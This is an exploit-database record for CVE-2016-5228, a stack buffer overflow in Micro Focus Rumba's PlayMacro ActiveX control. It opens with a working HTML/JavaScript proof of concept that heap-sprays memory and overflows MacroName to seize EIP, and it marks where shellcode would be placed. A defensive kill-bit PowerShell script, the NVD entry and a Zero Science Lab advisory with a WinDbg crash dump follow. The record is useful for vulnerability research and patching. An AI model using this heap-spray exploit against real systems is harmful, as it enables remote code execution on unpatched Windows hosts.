ID: EDB-ID:40649 | Type: exploitdb | Reporter: Umit Aksu | Modified: 2016-10-31T00:00:00
Description
Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow. CVE-2016-5228. DoS exploit for the Windows platform.
# Exploit Title: Micro Focus Rumba <= 9.3 ActiveX Stack-based buffer overflow
# Date: 29-10-2016
# Exploit Author: Umit Aksu
# Vendor Homepage: http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28600.micro-focus-rumba-9-x-security-update.aspx
# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40231
# Version: <= 9.3
# Tested on: Internet Explorer 11 on windows 7
# CVE : CVE-2016-5228
1. Description
Stack-based buffer overflow in the PlayMacro function in ObjectXMacro.ObjectXMacro in WdMacCtl.ocx in Micro Focus Rumba 9.x before 9.3 HF 11997 and 9.4.x before 9.4 HF 12815 allows remote attackers to execute arbitrary code via a long MacroName argument.
2. Proof of Concept
The code below sprays the heap so that a known address holds data we control, and the overflow then references that address. The exploit code only demonstrates overwriting EIP; the rest is up to you.
<html>
<head>
 <object classid='clsid:56359FC0-E847-11CE-BE79-02608C8F68F1' id='_vulActiveX'>
 </object>
</head>
<body>
<div id="blah"></div>

<script language="javascript">

function vuln(){
// 272 bytes of junk data
// 272 + "\x43\x43\x43\x43" => EDX = 43434343
//
// If we change EDX to an address that points to a valid address,
// we will have control over EIP
// 0x20302228

// Overwrite the stack
var evil_payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
// Address pointing to our sprayed heap
var EDX = "\x28\x22\x30\x20";

evil_payload += EDX;

_vulActiveX.PlayMacro(evil_payload);
}

// This creates blocks of memory with data we control
// and attaches the data to a button.title.
// By doing this we have a predictable place in memory containing our data.
// This data can be used to hold shellcode and, as in this case, to
// point to a valid address that overwrites EIP.

// Heap spraying technique of corelanc0d3r
// See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/

var div_container = document.getElementById("blah");
div_container.style.cssText = "display:none";
var data;
var offset = 0x104;
var jmp_address = "\x28\x22\x30\x20"; // same address as EDX above (not used below)

var junk = unescape("%u4747%u4747"); // <-------- EIP value
while(junk.length < 0x1000) junk += junk;

// 0x20302290: first dword of each sprayed block (little-endian %u2290%u2030)
shellcode = unescape("%u2290%u2030%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444");
data = junk.substring(0,offset) + shellcode;
data += junk.substring(0,0x800 - offset - shellcode.length);
while(data.length < 0x80000) data += data;
// Targets:
// FireFox: 0x20302210
// IE 8, 9 and 10/11: 0x20302228
for(var i = 0; i < 0x500; i++)
{
 var obj = document.createElement("button");
 obj.title = data.substring(0,0x40000-0x58);
 div_container.appendChild(obj);
}

</script>

<input type="button" onclick="javascript:vuln()" value="exploit" >

</body>
</html>
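As a defender-side addition (not part of the original advisory and not Micro Focus' code), the PowerShell below checks whether the control the PoC instantiates is registered, reports the file version of the COM server found through its InprocServer32 entry, and sets Microsoft's ActiveX kill bit (Compatibility Flags = 0x400) for that CLSID so Internet Explorer refuses to load the control on hosts that have not yet received the vendor hotfix (9.3 HF 11997 / 9.4 HF 12815). The CLSID is the one from the PoC; the registry paths are the documented kill-bit locations; the function names are this example's own.

```powershell
# Added example, not part of the original advisory or of Micro Focus' code.
# Checks the vulnerable Rumba ActiveX control (CLSID from the PoC above) and
# sets Microsoft's ActiveX kill bit so Internet Explorer will not instantiate it.
# Run from an elevated PowerShell prompt. Function names are this example's own.
$Clsid = '{56359FC0-E847-11CE-BE79-02608C8F68F1}'

# The control is 32-bit, so on 64-bit Windows both the native and the WOW64
# registry views have to be covered.
$ClsidKeys   = @("HKLM:\SOFTWARE\Classes\CLSID\$Clsid")
$KillBitKeys = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid")
if ([Environment]::Is64BitOperatingSystem) {
    $ClsidKeys   += "HKLM:\SOFTWARE\Classes\Wow6432Node\CLSID\$Clsid"
    $KillBitKeys += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
}

function Get-RumbaMacroControl {
    # Report each registration of the control and the file version of its COM server.
    foreach ($key in $ClsidKeys) {
        $server = Join-Path $key 'InprocServer32'
        if (-not (Test-Path $server)) { continue }
        $dll = (Get-ItemProperty -Path $server).'(default)'
        $version = if ($dll -and (Test-Path $dll)) {
            (Get-Item $dll).VersionInfo.FileVersion
        } else { 'server DLL not found on disk' }
        [pscustomobject]@{ ClsidKey = $key; Server = $dll; FileVersion = $version }
    }
}

function Test-KillBit {
    # True only if the 0x400 bit is set in every registry view that applies.
    foreach ($key in $KillBitKeys) {
        if (-not (Test-Path $key)) { return $false }
        $flags = (Get-ItemProperty -Path $key).'Compatibility Flags'
        if (-not ([int]$flags -band 0x400)) { return $false }
    }
    return $true
}

function Set-KillBit {
    # OR the kill bit into any existing flags rather than overwriting them.
    foreach ($key in $KillBitKeys) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        $flags = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'Compatibility Flags'
        $newFlags = ([int]$flags) -bor 0x400
        New-ItemProperty -Path $key -Name 'Compatibility Flags' -PropertyType DWord `
            -Value $newFlags -Force | Out-Null
    }
}

$found = Get-RumbaMacroControl
if (-not $found) {
    "Control $Clsid is not registered on this host; nothing to kill-bit."
} else {
    $found | Format-List
    if (-not (Test-KillBit)) { Set-KillBit }
    "Kill bit set for ${Clsid}: $(Test-KillBit)"
}
```

The kill bit only stops Internet Explorer (and other hosts that honour Compatibility Flags) from instantiating the control; it does not remove the overflow from WdMacCtl.ocx, so any Rumba feature that drives the control from the browser stops working and the hotfix remains the actual fix. The FileVersion field is there to confirm after patching that the installed server is the hotfixed build before the kill bit is lifted.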
Related records

CVE-2016-5228 (NVD) - https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5228
Published 2016-07-03, modified 2017-09-03. CVSS 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).
Stack-based buffer overflow in the PlayMacro function in ObjectXMacro.ObjectXMacro in WdMacCtl.ocx in Micro Focus Rumba 9.x before 9.3 HF 11997 and 9.4.x before 9.4 HF 12815 allows remote attackers to execute arbitrary code via a long MacroName argument. NOTE: some references mention CVE-2016-5226 but that is not a correct ID for any Rumba vulnerability.

PACKETSTORM:139432 - Micro Focus Rumba 9.3 Active-X Stack Buffer Overflow (2016-10-31); same exploit text as above.
https://packetstormsecurity.com/files/139432/Micro-Focus-Rumba-9.3-Active-X-Stack-Buffer-Overflow.html

1337DAY-ID-26171 - Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow (2016-10-31); same exploit text as above.
https://0day.today/exploit/26171

ZSL-2016-5327 - Micro Focus Rumba+ v9.4 Multiple Stack Buffer Overflow Vulnerabilities (Zero Science Lab)
http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5327.php
Type: Local/Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 26.05.2016

Summary
Rumba is a terminal emulation solution with UI (User Interface) modernization properties. Rumba and Rumba+ allow users to connect to so-called 'legacy systems' (typically a mainframe) via desktop, web and mobile.

Description
The Rumba+ software package suffers from multiple stack buffer overflow vulnerabilities when parsing large amounts of bytes passed to several functions in several OLE controls. An attacker can gain access to the system of the affected node and execute arbitrary code.

--------------------------------------------------------------------------------
(1d78.52c): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SysWOW64\ntdll.dll -
eax=00000000 ebx=45454545 ecx=74d72a9c edx=42424242 esi=0032ddc0 edi=00000000
eip=770a15fe esp=0032dd58 ebp=0032ddac iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!NtRaiseException+0x12:
770a15fe 83c404 add esp,4
0:000> !exchain
0032e7cc: 45454545
Invalid exception stack at 44444444
0:000> d 0032e7cc
0032e7cc 44 44 44 44 45 45 45 45-43 43 43 43 43 43 43 43 DDDDEEEECCCCCCCC
0032e7dc 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0032e7ec 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0032e7fc 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0032e80c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0032e81c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0032e82c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0032e83c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0032ddac 77147415 0032ddc0 0032de10 00000000 ntdll!NtRaiseException+0x12
0032e0e0 7711071a 45454545 fffffffe fffffffe ntdll!RtlRemoteCall+0x236
0032e130 770db3f5 45454545 0000004d 0032e82c ntdll!RtlUlonglongByteSwap+0x1327a
0032e1b0 77090133 0032e1c8 0032e218 0032e1c8 ntdll!LdrRemoveLoadAsDataTable+0xcac
0032e7b0 41414141 42424242 43434343 43434343 ntdll!KiUserExceptionDispatcher+0xf
0032e7b4 42424242 43434343 43434343 43434343 0x41414141
0032e7b8 43434343 43434343 43434343 43434343 0x42424242
0032e7bc 43434343 43434343 43434343 44444444 0x43434343
0032e7c0 43434343 43434343 44444444 45454545 0x43434343
0032e7c4 43434343 44444444 45454545 43434343 0x43434343
0032e7c8 44444444 45454545 43434343 43434343 0x43434343
0032e7cc 45454545 43434343 43434343 43434343 0x44444444
0032e7d0 43434343 43434343 43434343 43434343 0x45454545
0032e7d4 43434343 43434343 43434343 43434343 0x43434343
0032e7d8 43434343 43434343 43434343 43434343 0x43434343
0032e7dc 43434343 43434343 43434343 43434343 0x43434343
--------------------------------------------------------------------------------

Vendor
Micro Focus - https://www.microfocus.com

Affected Version
9.4.4058.0 and 9.4.0 SP0 Patch0

Tested On
Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Enterprise SP1 (EN)

Vendor Status
[03.02.2016] Vulnerability discovered.
[13.02.2016] Vendor contacted.
[25.05.2016] No response from the vendor.
[26.05.2016] Public security advisory released.
[30.06.2016] Vendor releases Rumba 9.4 (HF 13960), Rumba 9.4 (HF 12815) and 9.3 (HF 11997) to address these issues.

PoC
rumba_bof.txt - http://zeroscience.mk/codes/rumba_bof.txt

Credits
Vulnerability discovered by Gjoko Krstic - gjoko@zeroscience.mk

References
[1] https://www.exploit-db.com/exploits/39857/
[2] https://cxsecurity.com/issue/WLB-2016050136
[3] https://packetstormsecurity.com/files/137205
[4] https://exchange.xforce.ibmcloud.com/vulnerabilities/113527
[5] http://www.vfocus.net/art/20160530/12710.html
[6] http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28601.rumba-9-4-stack-buffer-overflow-vulnerabilities.aspx
[7] http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28600.micro-focus-rumba-9-x-security-update.aspx
[8] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1606
[9] https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1606
[10] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5228
[11] https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5228
[12] http://www.securiteam.com/securitynews/5NP3I00J6U.html
[13] https://www.us-cert.gov/ncas/bulletins/SB16-193
[14] http://www.securityfocus.com/bid/91559

Changelog
[26.05.2016] - Initial release
[27.05.2016] - Added reference [2]
[28.05.2016] - Added reference [3] and [4]
[14.06.2016] - Added reference [5]
[30.06.2016] - Added vendor status and reference [6], [7], [8], [9], [10] and [11]
[25.07.2016] - Added reference [12], [13] and [14]

Contact
Zero Science Lab
Web: http://www.zeroscience.mk
e-mail: lab@zeroscience.mk